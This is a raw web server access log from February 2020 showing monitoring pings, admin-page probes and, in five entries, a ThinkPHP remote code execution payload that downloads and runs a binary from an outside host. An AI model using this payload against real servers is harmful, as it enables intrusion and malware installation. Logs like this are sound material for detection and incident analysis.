106.13.37.56 - - [01/Feb/2020:15:57:00 +0100] "GET /websql/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:57:00 +0100] "GET /MySQLAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:57:00 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
91.205.24.180 - - [01/Feb/2020:15:57:28 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Feb/2020:15:57:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2020:15:58:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.20.67 - - [01/Feb/2020:15:59:07 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [01/Feb/2020:15:59:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.106.181 - - [01/Feb/2020:16:00:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
212.91.246.72 - - [01/Feb/2020:16:00:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
203.76.196.190 - - [01/Feb/2020:16:01:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Feb/2020:16:01:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2020:16:02:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.113.51.184 - - [01/Feb/2020:16:03:25 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [01/Feb/2020:16:03:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.50.16.78 - - [01/Feb/2020:16:04:02 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
94.51.40.242 - - [01/Feb/2020:16:04:22 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [01/Feb/2020:16:04:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2020:16:05:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.112.59.81 - - [01/Feb/2020:16:06:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
193.112.59.81 - - [01/Feb/2020:16:06:23 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
193.112.59.81 - - [01/Feb/2020:16:06:23 +0100] "POST /Admin53f65bd4/Login.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
87.107.72.164 - - [01/Feb/2020:16:06:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Feb/2020:16:06:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2020:16:07:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Feb/2020:16:08:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
96.9.78.47 - - [01/Feb/2020:16:09:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Feb/2020:16:09:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
121.63.52.50 - - [01/Feb/2020:16:09:47 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
